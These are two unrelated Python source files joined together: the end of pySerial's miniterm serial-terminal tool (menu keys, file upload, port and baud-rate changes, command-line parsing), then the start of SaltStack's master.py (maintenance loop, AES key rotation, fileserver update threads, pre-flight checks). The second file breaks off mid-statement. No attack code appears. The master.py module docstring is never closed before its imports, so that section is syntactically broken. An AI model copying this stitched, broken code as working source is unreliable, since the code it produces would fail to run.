self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
        elif c == '7':                          # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
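            # NOTE: unreachable as written: 'sS' is already consumed by the
            # suspend/open branch above, so space parity cannot be selected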
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
            sys.stderr.write('--- unknown menu character {} ---\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script
# e.g. to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
master.py
|
"""
This module contains all of the routines needed to set up a master server;
this involves preparing the three listeners and the workers needed by the
master.
import collections
import copy
import ctypes
import functools
import logging
import multiprocessing
import os
import re
import signal
import stat
import sys
import threading
import time
import salt.acl
import salt.auth
import salt.client
import salt.client.ssh.client
import salt.crypt
import salt.daemons.masterapi
import salt.defaults.exitcodes
import salt.engines
import salt.exceptions
import salt.ext.tornado.gen # pylint: disable=F0401
import salt.key
import salt.log.setup
import salt.minion
import salt.payload
import salt.pillar
import salt.runner
import salt.serializers.msgpack
import salt.state
import salt.transport.server
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.gitfs
import salt.utils.gzip_util
import salt.utils.jid
import salt.utils.job
import salt.utils.master
import salt.utils.minions
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.stringutils
import salt.utils.user
import salt.utils.verify
import salt.utils.zeromq
import salt.wheel
from salt.config import DEFAULT_INTERVAL
from salt.defaults import DEFAULT_TARGET_DELIM
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.ext.tornado.stack_context import StackContext
from salt.transport import iter_transport_opts
from salt.utils.ctx import RequestContext
from salt.utils.debug import (
enable_sigusr1_handler,
enable_sigusr2_handler,
inspect_stack,
)
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.zeromq import ZMQ_VERSION_INFO, ZMQDefaultLoop, install_zmq, zmq
# pylint: enable=import-error,no-name-in-module,redefined-builtin
try:
import resource
HAS_RESOURCE = True
except ImportError:
# resource is not available on windows
HAS_RESOURCE = False
try:
import halite # pylint: disable=import-error
HAS_HALITE = True
except ImportError:
HAS_HALITE = False
log = logging.getLogger(__name__)
class SMaster:
"""
    Create a simple salt-master; this will generate the top-level master
"""
secrets = (
{}
) # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION}
def __init__(self, opts):
"""
Create a salt master server instance
:param dict opts: The salt options dictionary
"""
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self.opts = state["opts"]
self.master_key = state["master_key"]
self.key = state["key"]
SMaster.secrets = state["secrets"]
def __getstate__(self):
return {
"opts": self.opts,
"master_key": self.master_key,
"key": self.key,
"secrets": SMaster.secrets,
}
def __prep_key(self):
"""
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
"""
return salt.daemons.masterapi.access_keys(self.opts)
class Maintenance(salt.utils.process.SignalHandlingProcess):
"""
A generalized maintenance process which performs maintenance routines.
"""
def __init__(self, opts, **kwargs):
"""
Create a maintenance instance
:param dict opts: The salt options
"""
super().__init__(**kwargs)
self.opts = opts
# How often do we perform the maintenance tasks
self.loop_interval = int(self.opts["loop_interval"])
# Track key rotation intervals
self.rotate = int(time.time())
# A serializer for general maint operations
self.serial = salt.payload.Serial(self.opts)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self.__init__(
state["opts"],
log_queue=state["log_queue"],
log_queue_level=state["log_queue_level"],
)
def __getstate__(self):
return {
"opts": self.opts,
"log_queue": self.log_queue,
"log_queue_level": self.log_queue_level,
}
def _post_fork_init(self):
"""
Some things need to be init'd after the fork has completed
The easiest example is that one of these module types creates a thread
in the parent process, then once the fork happens you'll start getting
errors like "WARNING: Mixing fork() and threads detected; memory leaked."
"""
# Load Runners
ropts = dict(self.opts)
ropts["quiet"] = True
runner_client = salt.runner.RunnerClient(ropts)
# Load Returners
self.returners = salt.loader.returners(self.opts, {})
# Init Scheduler
self.schedule = salt.utils.schedule.Schedule(
self.opts, runner_client.functions_dict(), returners=self.returners
)
self.ckminions = salt.utils.minions.CkMinions(self.opts)
# Make Event bus for firing
self.event = salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
)
# Init any values needed by the git ext pillar
self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts)
if self.opts["maintenance_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting Maintenance niceness to %d", self.opts["maintenance_niceness"]
)
os.nice(self.opts["maintenance_niceness"])
self.presence_events = False
if self.opts.get("presence_events", False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != "tcp":
tcp_only = False
            if not tcp_only:
                # For a TCP-only transport, presence events are handled in the
                # transport code, so only fire them here when some other
                # transport is configured.
                self.presence_events = True
def run(self):
"""
This is the general passive maintenance process controller for the Salt
master.
This is where any data that needs to be cleanly maintained from the
master is maintained.
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
# init things that need to be done after the process is forked
self._post_fork_init()
# Make Start Times
last = int(time.time())
# update git_pillar on first loop
last_git_pillar_update = 0
git_pillar_update_interval = self.opts.get("git_pillar_update_interval", 0)
old_present = set()
while True:
now = int(time.time())
if (now - last) >= self.loop_interval:
salt.daemons.masterapi.clean_old_jobs(self.opts)
salt.daemons.masterapi.clean_expired_tokens(self.opts)
salt.daemons.masterapi.clean_pub_auth(self.opts)
if (now - last_git_pillar_update) >= git_pillar_update_interval:
last_git_pillar_update = now
self.handle_git_pillar()
self.handle_schedule()
self.handle_key_cache()
self.handle_presence(old_present)
self.handle_key_rotate(now)
salt.utils.verify.check_max_open_files(self.opts)
last = now
time.sleep(self.loop_interval)
def handle_key_cache(self):
"""
Evaluate accepted keys and create a msgpack file
which contains a list
"""
if self.opts["key_cache"] == "sched":
keys = []
# TODO DRY from CKMinions
if self.opts["transport"] in ("zeromq", "tcp"):
acc = "minions"
else:
acc = "accepted"
for fn_ in os.listdir(os.path.join(self.opts["pki_dir"], acc)):
if not fn_.startswith(".") and os.path.isfile(
os.path.join(self.opts["pki_dir"], acc, fn_)
):
keys.append(fn_)
log.debug("Writing master key cache")
# Write a temporary file securely
with salt.utils.atomicfile.atomic_open(
os.path.join(self.opts["pki_dir"], acc, ".key_cache"), mode="wb"
) as cache_file:
self.serial.dump(keys, cache_file)
def handle_key_rotate(self, now):
"""
        Rotate the AES key when a rotation has been requested (via the drop
        file) or the publish session interval has elapsed
"""
to_rotate = False
dfn = os.path.join(self.opts["cachedir"], ".dfn")
try:
stats = os.stat(dfn)
# Basic Windows permissions don't distinguish between
# user/group/all. Check for read-only state instead.
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
to_rotate = True
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
elif stats.st_mode == 0o100400:
to_rotate = True
else:
log.error("Found dropfile with incorrect permissions, ignoring...")
os.remove(dfn)
except os.error:
pass
if self.opts.get("publish_session"):
if now - self.rotate >= self.opts["publish_session"]:
to_rotate = True
if to_rotate:
log.info("Rotating master AES key")
for secret_key, secret_map in SMaster.secrets.items():
# should be unnecessary-- since no one else should be modifying
with secret_map["secret"].get_lock():
secret_map["secret"].value = salt.utils.stringutils.to_bytes(
secret_map["reload"]()
)
self.event.fire_event(
{"rotate_{}_key".format(secret_key): True}, tag="key"
)
self.rotate = now
if self.opts.get("ping_on_rotate"):
# Ping all minions to get them to pick up the new key
log.debug("Pinging all connected minions " "due to key rotation")
salt.utils.master.ping_all_connected_minions(self.opts)
def handle_git_pillar(self):
"""
Update git pillar
"""
try:
for pillar in self.git_pillar:
pillar.fetch_remotes()
except Exception as exc: # pylint: disable=broad-except
log.error("Exception caught while updating git_pillar", exc_info=True)
def handle_schedule(self):
"""
Evaluate the scheduler
"""
try:
self.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if self.schedule.loop_interval < self.loop_interval:
self.loop_interval = self.schedule.loop_interval
except Exception as exc: # pylint: disable=broad-except
log.error("Exception %s occurred in scheduled job", exc)
self.schedule.cleanup_subprocesses()
def handle_presence(self, old_present):
"""
Fire presence events if enabled
"""
# On the first run it may need more time for the EventPublisher
# to come up and be ready. Set the timeout to account for this.
if self.presence_events and self.event.connect_pull(timeout=3):
present = self.ckminions.connected_ids()
new = present.difference(old_present)
lost = old_present.difference(present)
if new or lost:
# Fire new minions present event
data = {"new": list(new), "lost": list(lost)}
self.event.fire_event(data, tagify("change", "presence"))
data = {"present": list(present)}
self.event.fire_event(data, tagify("present", "presence"))
old_present.clear()
old_present.update(present)
class FileserverUpdate(salt.utils.process.SignalHandlingProcess):
"""
A process from which to update any dynamic fileserver backends
"""
def __init__(self, opts, **kwargs):
super().__init__(**kwargs)
self.opts = opts
self.update_threads = {}
# Avoid circular import
import salt.fileserver
self.fileserver = salt.fileserver.Fileserver(self.opts)
self.fill_buckets()
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self.__init__(
state["opts"], log_queue=state["log_queue"],
)
def __getstate__(self):
return {
"opts": self.opts,
"log_queue": self.log_queue,
}
def fill_buckets(self):
"""
Get the configured backends and the intervals for any backend which
supports them, and set up the update "buckets". There will be one
bucket for each thing being updated at a given interval.
"""
update_intervals = self.fileserver.update_intervals()
self.buckets = {}
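        # Resulting shape (for illustration):
        #   self.buckets = {
        #       <interval seconds>: OrderedDict({
        #           (<backend name>, <update func>): [<remote ids>] or None,
        #       }),
        #   }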
for backend in self.fileserver.backends():
fstr = "{}.update".format(backend)
try:
update_func = self.fileserver.servers[fstr]
except KeyError:
log.debug("No update function for the %s filserver backend", backend)
continue
if backend in update_intervals:
# Variable intervals are supported for this backend
for id_, interval in update_intervals[backend].items():
if not interval:
# Don't allow an interval of 0
interval = DEFAULT_INTERVAL
log.debug(
"An update_interval of 0 is not supported, "
"falling back to %s",
interval,
)
i_ptr = self.buckets.setdefault(interval, OrderedDict())
# Backend doesn't technically need to be present in the
# key, all we *really* need is the function reference, but
# having it there makes it easier to provide meaningful
# debug logging in the update threads.
i_ptr.setdefault((backend, update_func), []).append(id_)
else:
# Variable intervals are not supported for this backend, so
# fall back to the global interval for that fileserver. Since
# this backend doesn't support variable updates, we have
# nothing to pass to the backend's update func, so we'll just
# set the value to None.
try:
interval_key = "{}_update_interval".format(backend)
interval = self.opts[interval_key]
except KeyError:
interval = DEFAULT_INTERVAL
log.warning(
"%s key missing from configuration. Falling back to "
"default interval of %d seconds",
interval_key,
interval,
)
self.buckets.setdefault(interval, OrderedDict())[
(backend, update_func)
] = None
def update_fileserver(self, interval, backends):
"""
Threading target which handles all updates for a given wait interval
"""
def _do_update():
log.debug(
"Performing fileserver updates for items with an update "
"interval of %d",
interval,
)
for backend, update_args in backends.items():
backend_name, update_func = backend
try:
if update_args:
log.debug(
"Updating %s fileserver cache for the following "
"targets: %s",
backend_name,
update_args,
)
args = (update_args,)
else:
log.debug("Updating %s fileserver cache", backend_name)
args = ()
update_func(*args)
except Exception as exc: # pylint: disable=broad-except
log.exception(
"Uncaught exception while updating %s fileserver " "cache",
backend_name,
)
log.debug(
"Completed fileserver updates for items with an update "
"interval of %d, waiting %d seconds",
interval,
interval,
)
condition = threading.Condition()
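        # The condition is never notified; Condition.wait(interval) simply
        # serves as a sleep between update passes.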
_do_update()
while True:
with condition:
condition.wait(interval)
_do_update()
def run(self):
"""
Start the update threads
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
if (
self.opts["fileserver_update_niceness"]
and not salt.utils.platform.is_windows()
):
log.info(
"setting FileServerUpdate niceness to %d",
self.opts["fileserver_update_niceness"],
)
os.nice(self.opts["fileserver_update_niceness"])
# Clean out the fileserver backend cache
salt.daemons.masterapi.clean_fsbackend(self.opts)
for interval in self.buckets:
self.update_threads[interval] = threading.Thread(
target=self.update_fileserver, args=(interval, self.buckets[interval]),
)
self.update_threads[interval].start()
# Keep the process alive
while True:
time.sleep(60)
class Master(SMaster):
"""
The salt master server
"""
def __init__(self, opts):
"""
Create a salt master server instance
        :param dict opts: The salt options dictionary
"""
if zmq and ZMQ_VERSION_INFO < (3, 2):
log.warning(
"You have a version of ZMQ less than ZMQ 3.2! There are "
"known connection keep-alive issues with ZMQ < 3.2 which "
"may result in loss of contact with minions. Please "
"upgrade your ZMQ!"
)
SMaster.__init__(self, opts)
def __set_max_open_files(self):
if not HAS_RESOURCE:
return
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
            # Unclear what to do with infinity... macOS reports RLIM_INFINITY
            # as the hard limit, but raising to anything above the soft limit
            # fails...
mof_h = mof_s
log.info(
"Current values for max open files soft/hard setting: %s/%s", mof_s, mof_h
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts["max_open_files"]
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
"The value for the 'max_open_files' setting, %s, is higher "
"than the highest value the user running salt is allowed to "
"set (%s). Defaulting to %s.",
mof_c,
mof_h,
mof_h,
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info("Raising max open files value to %s", mof_c)
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
"New values for max open files soft/hard values: %s/%s",
mof_s,
mof_h,
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under macOS reported that our 100000 default value is
# still too high.
log.critical(
"Failed to raise max open files setting to %s. If this "
"value is too low, the salt-master will most likely fail "
"to run properly.",
mof_c,
)
def _pre_flight(self):
"""
        Run pre-flight checks. If anything in this method fails then the
        master should not start up.
"""
errors = []
critical_errors = []
try:
os.chdir("/")
except OSError as err:
errors.append("Cannot change to root directory ({})".format(err))
if self.opts.get("fileserver_verify_config", True):
# Avoid circular import
import salt.fileserver
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
"Failed to load fileserver backends, the configured backends "
"are: {}".format(", ".join(self.opts["fileserver_backend"]))
)
else:
# Run init() for all backends which support the function, to
# double-check configuration
try:
fileserver.init()
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append("{}".format(exc))
if not self.opts["fileserver_backend"]:
errors.append("No fileserver backends are configured")
# Check to see if we need to create a pillar cache dir
if self.opts["pillar_cache"] and not os.path.isdir(
os.path.join(self.opts["cachedir"], "pillar_cache")
):
try:
with salt.utils.files.set_umask(0o077):
os.mkdir(os.path.join(self.opts["cachedir"], "pillar_cache"))
except OSError:
pass
if self.opts.get("git_pillar_verify_config", True):
try:
git_pillars = [
x
for x in self.opts.get("ext_pillar", [])
if "git" in x and not isinstance(x["git"], str)
]
except TypeError:
git_pillars = []
critical_errors.append(
